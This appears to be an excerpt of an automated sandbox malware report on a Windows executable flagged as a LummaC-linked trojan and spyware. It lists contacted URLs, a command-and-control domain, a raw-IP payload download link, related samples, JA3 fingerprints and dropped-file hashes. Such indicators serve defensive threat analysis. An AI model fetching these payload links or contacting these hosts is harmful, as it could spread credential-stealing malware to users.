                                                                                            https://observerfry.lat/apiype-fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                  		high
                                                                                                  https://observerfry.lat/fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://observerfry.lat/apiCfnCae9FQhg.exe, 00000001.00000003.2365046031.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://ocsp.rootca1.amazontrust.com0:fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorfnCae9FQhg.exe, 00000001.00000002.2573643849.0000000005EB9000.00000002.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506188966.0000000005876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dz8aopenkvv6s.cloudfront.netfnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://ac.ecosia.org/autocomplete?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://observerfry.lat/ks(;fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://cdn.cookielaw.org/fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://observerfry.lat/apibPfnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://observerfry.lat/icfnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://remote-app-switcher.stg-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://185.215.113.16/off/def.exefnCae9FQhg.exe, 00000001.00000003.2506607339.0000000000979000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2570535052.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://bbuseruploads.s3.amazonaws.com/fnCae9FQhg.exe, 00000001.00000002.2570241622.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000955000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2506709241.0000000000969000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high

                                                                                                                                        World Map of Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public IPs

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        185.166.143.48
                                                                                                                                        		bitbucket.orgGermany
                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                        16.182.108.137
                                                                                                                                        		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                        		unknownunknownfalse
                                                                                                                                        104.21.36.201
                                                                                                                                        		observerfry.latUnited States
                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1580353
                                                                                                                                        Start date and time:2024-12-24 11:21:11 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 6m 28s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:fnCae9FQhg.exe
                                                                                                                                        renamed because original name is a hash value
                                                                                                                                        Original Sample Name:f52f8ec2cddc2977f7f74fcfdf87d35f.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:Failed
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                        Warnings

                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.246.63, 172.202.163.200, 20.190.177.83
                                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        • VT rate limit hit for: fnCae9FQhg.exe

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        05:22:15API Interceptor24x Sleep call for process: fnCae9FQhg.exe modified
                                                                                                                                        05:22:49API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                                                        • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                                                        16.182.108.137SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          104.21.36.201SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                    NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              observerfry.latO5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.199.72
                                                                                                                                                              s3-w.us-east-1.amazonaws.comGq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                              • 3.5.8.193
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 52.217.14.36
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 16.15.177.52
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.17.0
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 54.231.128.9
                                                                                                                                                              http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 54.231.128.17
                                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.27.149
                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                              • 3.5.29.203
                                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 52.217.75.84
                                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 3.5.25.145
                                                                                                                                                              bitbucket.orgGq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.49

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              CLOUDFLARENETUSSFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 162.159.128.70
                                                                                                                                                              https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.21.17.63
                                                                                                                                                              http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.207.202
                                                                                                                                                              eCompleted_419z.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 104.21.112.1
                                                                                                                                                              3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.157.254
                                                                                                                                                              oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.66.86
                                                                                                                                                              L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 172.67.157.254
                                                                                                                                                              LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 104.21.63.229
                                                                                                                                                              O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              AMAZON-02UShttps://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 54.73.104.6
                                                                                                                                                              nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 54.171.230.55
                                                                                                                                                              Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                              • 185.166.143.49
                                                                                                                                                              Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 185.166.143.50
                                                                                                                                                              sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                              • 54.171.230.55
                                                                                                                                                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                              • 54.171.230.55

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137
                                                                                                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              • 104.21.36.201
                                                                                                                                                              • 185.166.143.48
                                                                                                                                                              • 16.182.108.137

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fnCae9FQhg.exe_3d3da4a09d73fd4ee1c79d99ddb843b4e3ef6d_6e0c65a9_2bb55fda-cd4b-4646-9329-eb97843cfd1a\Report.wer

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):65536
                                                                                                                                                              Entropy (8bit):1.0445107699253844
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Mdv9eUKWWkD0BU/Qscjudx1fzuiFEZ24IO8o54:UWBBU/wjYzuiFEY4IO8L
                                                                                                                                                              MD5:CC66E7742D0D39D9953E1C238C791EDE
                                                                                                                                                              SHA1:3012E39860D9D62526F5C2CC142B5C72EB8B7182
                                                                                                                                                              SHA-256:B876A0BB375BF9299E7CC13F7C0DE26AC9FEB372B9C4BB35A124074EF1C0C99C
                                                                                                                                                              SHA-512:2F6D6C55FEA26641C6FB25CF337D87A4DEC4659747A95AC64B22701165233D940CCF1E174DD245F4718B92F525EEE2F82741D839AFF79DDC3421CCEA3ACFB1C4
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.9.3.6.3.6.8.2.6.6.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.9.3.6.4.2.7.6.4.1.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.b.5.5.f.d.a.-.c.d.4.b.-.4.6.4.6.-.9.3.2.9.-.e.b.9.7.8.4.3.c.f.d.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.a.8.7.2.9.8.-.c.2.6.c.-.4.8.5.b.-.a.4.3.1.-.4.8.d.8.b.3.4.d.f.e.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.n.C.a.e.9.F.Q.h.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.4.-.0.0.0.1.-.0.0.1.5.-.5.4.6.4.-.6.0.b.1.e.d.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.e.a.3.7.8.f.2.3.0.1.5.4.9.6.1.0.4.6.3.3.a.3.0.c.9.0.9.5.a.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.f.9.b.5.1.4.d.8.3.e.0.1.5.1.d.9.6.b.d.0.c.a.e.3.6.a.3.2.7.1.6.6.7.c.d.7.2.8.2.b.!.f.n.C.a.e.9.F.Q.h.g...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA2.tmp.dmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 10:22:43 2024, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):285874
                                                                                                                                                              Entropy (8bit):1.5085243908273411
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:IwWjwWBBknncvQlRogxc7JGpGBCUYk+L6HPGvCBFXmFlrc73D5XtCoKwVGOw/:EHBBFveRbc1GpGEkHPGaBVV3tdCIzS
                                                                                                                                                              MD5:1A1E1E4C81583760A677CB0F66F59C3A
                                                                                                                                                              SHA1:5E076804596780ACCA11F0B17856533F38CC5806
                                                                                                                                                              SHA-256:62A159ECF1122210A0152877488CD1FF7687D08A8B2B91114BDDC9A07A121C84
                                                                                                                                                              SHA-512:388CF7F9609592050BBC473A6558CCD3B98ADDE41DE292D63C9F173042A2802128752F125CC1ED5C3B6D4502539463629D0911E1B38FD1442FB59120C5013217
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MDMP..a..... .......s.jg....................................D....'..........L...........`.......8...........T............K...............(...........*..............................................................................eJ......`+......GenuineIntel............T...........R.jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1A.tmp.WERInternalMetadata.xml

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8378
                                                                                                                                                              Entropy (8bit):3.7030518284797957
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:R6l7wVeJ2I7k6pV6Y2DoSU9PgmfWvZprD89bCXsfN2m:R6lXJ86b6YFSU9Pgmf+wCcfl
                                                                                                                                                              MD5:39047E057A55E4E5E68BBF108C1B4D25
                                                                                                                                                              SHA1:615F3F63AE74491803889DA370CFBD559EE315CE
                                                                                                                                                              SHA-256:3A7878BE20526F1C42E6F5DFE8D28A3F4E3332D776B3FF3020F4B2971CBB9E61
                                                                                                                                                              SHA-512:EF08DED4E52247A5F617106698A2C55342D2A2FCCAAD4A1C5980B8470377EA463A37F0094A20685FA0D2B9A23A3392B78699CF0AF757713E339CCCB8E471A4D1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
